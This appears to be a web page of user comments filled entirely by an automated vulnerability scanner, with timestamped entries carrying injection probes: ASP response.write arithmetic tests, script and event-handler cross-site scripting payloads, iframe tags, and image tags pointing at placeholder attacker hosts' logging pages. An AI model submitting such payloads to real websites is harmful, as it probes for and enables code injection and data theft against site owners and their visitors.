  2021-05-06 08:24:44


  1


 • pHqghUme

  2021-05-06 08:24:42


  "+response.write(9475701*9984848)+"


 • pHqghUme

  2021-05-06 08:24:41


  '+response.write(9475701*9984848)+'


 • pHqghUme

  2021-05-06 08:24:40


  response.write(9475701*9984848)


 • '+response.write(9439107*9199449)+'

  2021-05-06 08:24:39


  1


 • "+response.write(9439107*9199449)+"

  2021-05-06 08:24:39


  1


 • pHqghUme

  2021-05-06 08:24:38


  1


 • response.write(9439107*9199449)

  2021-05-06 08:24:38


  1


 • pHqghUme

  2021-05-06 08:24:37


  1


 • pHqghUme

  2021-05-06 08:24:37


  1


 • pHqghUme

  2021-05-06 08:24:36


  1


 • pHqghUme

  2021-05-06 08:24:36


  1


 • pHqghUme

  2021-05-06 08:24:35


  1


 • pHqghUme

  2021-05-06 08:23:39


  1


 • pHqghUme

  2021-05-06 08:23:23


  1


 • pHqghUme

  2021-05-06 08:23:18


  1BeeolmKpzO


 • pHqghUme

  2021-05-06 08:23:17


  1


 • 15RZ2YVcIO

  2021-05-06 08:23:17


  1


 • pHqghUme

  2021-05-06 08:23:16


  1


 • pHqghUme

  2021-05-06 08:04:11


  1


 • pHqghUme

  2021-05-06 05:40:08


  1<ElwwrF<


 • pHqghUme

  2021-05-06 05:40:03


  1<img sRc='http://attacker-9890/log.php?


 • pHqghUme<pI6fYF<

  2021-05-06 05:39:49


  1


 • pHqghUme

  2021-05-06 05:39:48


  1<Y03NuF x=9196>


 • pHqghUme<img sRc='http://attacker-9647/log.php?

  2021-05-06 05:39:42


  1


 • pHqghUme<ZFvskG x=9356>

  2021-05-06 05:39:35


  1


 • pHqghUme<ifRAme sRc=9914.com></IfRamE>

  2021-05-06 05:39:29


  1


 • pHqghUme

  2021-05-06 05:39:21


  1<ifRAme sRc=9750.com></IfRamE>


 • pHqghUme<WVROY6>C0OKW[!+!]</WVROY6>

  2021-05-06 05:39:19


  1


 • pHqghUme

  2021-05-06 05:39:11


  1<W8KM8W>UH2NV[!+!]</W8KM8W>


 • pHqghUmeLuyjD <ScRiPt >nYVU(9992)</ScRiPt>

  2021-05-06 05:39:08


  1


 • pHqghUme<% contenteditable onresize=nYVU(9070)>

  2021-05-06 05:38:56


  1